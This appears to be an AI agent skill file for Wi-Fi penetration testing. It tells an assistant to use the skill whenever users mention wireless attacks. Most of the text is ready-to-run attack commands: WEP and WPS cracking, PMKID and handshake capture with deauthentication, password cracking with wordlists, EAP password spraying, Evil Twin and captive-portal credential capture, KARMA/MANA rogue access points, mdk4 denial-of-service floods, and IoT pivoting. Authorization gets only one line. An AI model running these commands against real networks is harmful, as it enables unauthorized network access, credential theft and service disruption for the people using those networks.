| name | wifi-pentest |
| description | Wi-Fi security testing and penetration testing. Use this skill whenever the user mentions Wi-Fi attacks, wireless security testing, WEP/WPA/WPS cracking, Evil Twin attacks, deauthentication, handshake capture, PMKID attacks, WPA Enterprise testing, KARMA/MANA attacks, or any wireless network assessment. This skill covers reconnaissance, attack execution, and credential capture for Wi-Fi networks. |
Wi-Fi Pentesting Skill
A comprehensive skill for Wi-Fi security assessment and penetration testing. This skill guides you through wireless network reconnaissance, attack execution, and credential capture.
When to Use This Skill
Use this skill when the user asks about:
- Wi-Fi network security testing or assessment
- WEP, WPA, WPA2, WPA3 cracking or attacks
- WPS (Wi-Fi Protected Setup) attacks
- Evil Twin, KARMA, or MANA attacks
- Deauthentication or DoS attacks on Wi-Fi
- Handshake capture or PMKID extraction
- WPA Enterprise (802.1X) testing
- Wi-Fi Direct security testing
- IoT device Wi-Fi exploitation
- Wireless network reconnaissance
Prerequisites
Before starting any Wi-Fi pentest:
- Hardware: Wi-Fi adapter that supports monitor mode and packet injection
- OS: Kali Linux or similar penetration testing distribution
- Permissions: Root/sudo access required for most operations
- Legal: Ensure you have explicit authorization to test the target network
Quick Reference Commands
Interface Management
ip link show
iwconfig
airmon-ng check kill
airmon-ng start wlan0
iwconfig wlan0 mode monitor
airmon-ng stop wlan0mon
iwconfig wlan0mon mode managed
Network Scanning
airodump-ng wlan0mon
airodump-ng wlan0mon --band a
airodump-ng wlan0mon --wps
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA"
iwlist wlan0 scan
Attack Categories
1. Reconnaissance
Start with passive scanning to identify targets:
airodump-ng --bssid <BSSID> --channel <CH> --write capture wlan0mon
airodump-ng wlan0mon --wps
2. WEP Attacks
WEP is trivially broken. Use this workflow:
airodump-ng --bssid <BSSID> --channel <CH> --write wep_capture wlan0mon
aireplay-ng --arpreplay -b <BSSID> -h <CLIENT_MAC> wlan0mon
aircrack-ng wep_capture-01.cap
Why WEP fails: RC4 uses 24-bit IVs that repeat quickly. Same IV + same key = same keystream. XORing ciphertexts reveals plaintext. PTW attack reduces requirements to tens of thousands of packets.
3. WPS Attacks
WPS uses an 8-digit PIN with only ~11,000 effective combinations.
WPS Bruteforce
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -f -N -vv
bully wlan0mon -b <BSSID> -c <CHANNEL> -S -F -B -v 3
Pixie Dust Attack (Offline)
Exploits weak nonce generation in some APs:
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -N -vv
bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3
./oneshot -i wlan0 -K -b <BSSID>
Null PIN Attack
Some poorly configured APs accept empty PIN:
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -f -N -g 1 -vv -p ''
After obtaining WPS PIN: The PIN reveals the WPA/WPA2 PSK, granting persistent network access.
4. WPA/WPA2 PSK Attacks
PMKID Attack (Clientless)
Capture PMKID from AP without needing connected clients:
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool && make && make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
./eaphammer --pmkid --interface wlan0 --channel <CH> --bssid <BSSID>
hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Valid PMKID format: 4 parts, e.g., 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838
Handshake Capture
Traditional method requiring a connected client:
airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w /tmp/psk --output-format pcap
aireplay-ng -0 0 -a <BSSID> -c <CLIENT_MAC> wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> /tmp/psk*.cap
Verify Handshake in Capture
aircrack-ng psk-01.cap
tshark -r psk-01.cap -n -Y eapol
cowpatty -r psk-01.cap -s "ESSID" -f -
pyrit -r psk-01.cap analyze
5. WPA Enterprise (802.1X) Attacks
Enterprise networks use RADIUS authentication with various EAP methods.
Username Capture
EAP-Identity messages often contain usernames in cleartext:
airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID>
tcpdump -i wlan0mon -w eap_capture.pcap eapol
EAP Bruteforce (Password Spray)
./air-hammer.py -i wlan0 -e <ESSID> -P <PASSWORD> -u usernames.txt
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 \
--essid <ESSID> \
--password <PASSWORD> \
--user-list users.txt
SIM-based EAP (IMSI Leakage)
EAP-SIM/EAP-AKA can leak IMSI in cleartext:
airmon-ng start wlan0
tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap
6. Evil Twin Attacks
Evil Twin exploits client preference for stronger signals and known networks.
Open Evil Twin
airbase-ng -a <FAKE_MAC> --essid "<TARGET_ESSID>" -c <CHANNEL> wlan0mon
./eaphammer -i wlan0 --essid <ESSID> --captive-portal
WPA/WPA2 Evil Twin
Requires knowing the password:
./eaphammer -i wlan0 -e <ESSID> -c <CHANNEL> --creds --auth wpa-psk --wpa-passphrase "<PASSWORD>"
Enterprise Evil Twin
./eaphammer --cert-wizard
./eaphammer -i wlan0 --channel <CH> --auth wpa-eap --essid <ESSID> --creds
./eaphammer --negotiate gtc-downgrade
./eaphammer --negotiate weakest
Authentication method priority (default): GTC, MSCHAPV2, TTLS-MSCHAPV2, TTLS, TTLS-CHAP, TTLS-PAP, TTLS-MSCHAP, MD5
7. KARMA, MANA, Known Beacon Attacks
KARMA Attack
Responds to all probe requests:
./eaphammer -i wlan0 --cloaking full --captive-portal
MANA Attack
Learns PNL from directed probes, responds to broadcast probes:
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal]
Loud MANA
Broadcasts all observed SSIDs to increase hit rate:
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal]
Known Beacon Attack
Cycles through wordlist of SSIDs:
./eaphammer -i wlan0 --mana --loud --known-beacons --known-ssids-file wordlist.txt
Known Beacon Burst
Rapid-fire beacon transmission:
./forge-beacons -i wlan0 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
8. DoS Attacks
Deauthentication
aireplay-ng -0 <COUNT> -a <BSSID> -c <CLIENT_MAC> wlan0mon
mdk4 wlan0mon d -c <CHANNEL> -b <CLIENT_MAC> -E <ESSID> -B <BSSID>
Beacon Flooding (mdk4)
Creates fake APs, may crash scanners:
mdk4 wlan0mon b -a -w nta -m
Authentication DoS (mdk4)
Overloads AP with auth frames:
mdk4 wlan0mon a -a <BSSID> -m
mdk4 wlan0mon a -i <BSSID> -m
TKIP Michael Countermeasures (mdk4)
Triggers 1-minute AP shutdown on TKIP APs:
mdk4 wlan0mon m -t <BSSID> [-j]
EAPOL Flooding (mdk4)
Creates fake sessions or disconnects clients:
mdk4 wlan0mon e -t <BSSID> [-l]
9. Wi-Fi Direct Attacks
EvilDirect Hijacking
Impersonate Wi-Fi Direct group owner:
airbase-ng -a <FAKE_MAC> --essid <DIRECT_ESSID> -c <CHANNEL> wlan0mon
10. IoT Pivoting (Shelly Gen4 Example)
Some IoT devices keep commissioning AP active:
http://192.168.33.1/relay/0?turn=on
Shelly.addEventHandler(function (event) {
if (event.component === "switch:0" && event.info.state) {
Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
}
});
Tools Installation
EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup
Airgeddon
mv $(which dhcpd) $(which dhcpd).old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
docker run --rm -ti --name airgeddon --net=host --privileged \
-p 3000:3000 -v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F '=' '{print $2}') \
v1s1t0r1sh3r3/airgeddon
Wifiphisher
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install
Wifite2
Automates WPS/WEP/WPA-PSK attacks:
git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install
sudo wifite2 --interface wlan0mon
Best Practices
- Always verify authorization before testing any network
- Document findings including BSSID, channel, encryption type, vulnerabilities
- Use wordlists like rockyou.txt for password cracking
- Combine attacks - deauth + handshake capture, MANA + captive portal
- Test multiple methods - PMKID may work when handshake capture fails
- Consider PMF/802.11w - WPA3 networks may block spoofed deauth frames
- Check for client isolation on open/OWE networks before assuming L2 access
Common Issues
- Monitor mode fails: Some adapters don't support it. Try different hardware.
- Deauth not working: Target may have PMF/802.11w enabled (WPA3).
- Handshake not capturing: May need to wait for client to reconnect, or use PMKID instead.
- WPS timeout: AP may block MAC addresses. Use MAC rotation or try Pixie Dust.
- Evil Twin not connecting: Client may prefer stronger signal or validate certificates.
References
